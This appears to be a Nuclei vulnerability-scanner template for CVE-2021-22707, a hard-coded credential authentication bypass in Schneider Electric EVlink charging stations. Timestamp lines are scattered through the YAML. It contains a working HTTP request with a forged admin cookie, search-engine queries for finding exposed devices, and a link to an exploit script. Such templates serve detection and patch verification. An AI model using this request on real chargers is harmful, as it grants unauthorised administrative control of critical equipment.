2023-08-10 06:30:57 +00:00
id : CVE-2021-22707
info :
name : EVlink City < R8 V3.4.0.1 - Authentication Bypass
author : ritikchaddha,dorkerdevil
severity : critical
description : |
A CWE-798 : Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability.
2023-08-10 06:30:57 +00:00
reference :
- https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh
- https://nvd.nist.gov/vuln/detail/CVE-2021-22707
2023-08-31 11:46:18 +00:00
- http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06
2023-08-10 06:30:57 +00:00
classification :
2023-08-31 11:46:18 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-08-10 06:30:57 +00:00
cve-id : CVE-2021-22707
2023-08-31 11:46:18 +00:00
cwe-id : CWE-798
2024-05-31 19:23:20 +00:00
epss-score : 0.39995
epss-percentile : 0.97263
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:*
2023-08-10 06:30:57 +00:00
metadata :
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-08-31 11:46:18 +00:00
vendor : schneider-electric
product : evlink_city_evc1s22p4_firmware
2024-06-07 10:04:29 +00:00
shodan-query :
- title:"EVSE web interface"
- http.title:"evse web interface"
fofa-query :
- title="EVSE web interface"
- title="evse web interface"
2024-05-31 19:23:20 +00:00
google-query : intitle:"evse web interface"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,evlink,auth-bypass,schneider-electric
2023-08-10 06:30:57 +00:00
http :
- raw :
- |
GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
Cookie : CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin
host-redirects : true
max-redirects : 2
2023-08-31 11:46:18 +00:00
2023-08-10 06:30:57 +00:00
matchers-condition : and
matchers :
- type : word
words :
- '?worker=Cluster" name="cluster" id="id_cluster'
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4b0a0048304602210092dfe2533a52f87c96d6308d504b960276cf7295c5f7ef1936eec72b5d63c60f022100b283e569e67182a0d0f45d5c48bb4d846940df584fb65a3418e2362705583429:922c64590222798bb761d5b6d8e72950